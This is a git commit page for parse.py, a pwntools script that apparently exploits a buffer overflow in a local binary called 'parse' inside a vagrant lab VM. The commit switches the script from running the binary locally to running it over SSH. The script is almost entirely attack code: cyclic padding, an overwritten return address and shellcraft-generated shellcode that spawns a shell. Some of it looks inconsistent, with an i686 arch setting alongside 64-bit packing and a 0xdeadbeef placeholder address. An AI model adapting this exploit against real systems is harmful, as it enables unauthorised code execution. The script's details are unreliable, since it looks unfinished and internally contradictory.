idk
This commit is contained in:
kod
parent
915386cc5e
commit
8a31a9b56a
BIN
parse
BIN
parse
Binary file not shown.
15
parse.py
15
parse.py
@ -1,6 +1,13 @@
|
|||||||
from pwn import *
|
from pwn import *
|
||||||
|
import base64
|
||||||
|
|
||||||
context.update(arch='amd64', os='linux')
|
context.update(arch='i686', os='linux')
|
||||||
|
|
||||||
|
# Connect to the server with SSH
|
||||||
|
ssh_connection = ssh('vagrant', 'default', port=2222)
|
||||||
|
|
||||||
|
# Open a shell to write more stuff to
|
||||||
|
bash = ssh_connection.run('bash')
|
||||||
|
|
||||||
shellcode = shellcraft.sh()
|
shellcode = shellcraft.sh()
|
||||||
print(shellcode)
|
print(shellcode)
|
||||||
@ -10,7 +17,7 @@ payload = cyclic(cyclic_find(0x0000555555555751))
|
|||||||
payload += p64(0xdeadbeef)
|
payload += p64(0xdeadbeef)
|
||||||
payload += asm(shellcode)
|
payload += asm(shellcode)
|
||||||
|
|
||||||
p = process("./parse")
|
bash.sendline('/vagrant/parse')
|
||||||
p.sendline(payload)
|
bash.sendline(payload)
|
||||||
p.interactive()
|
bash.interactive()
|
||||||
|
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user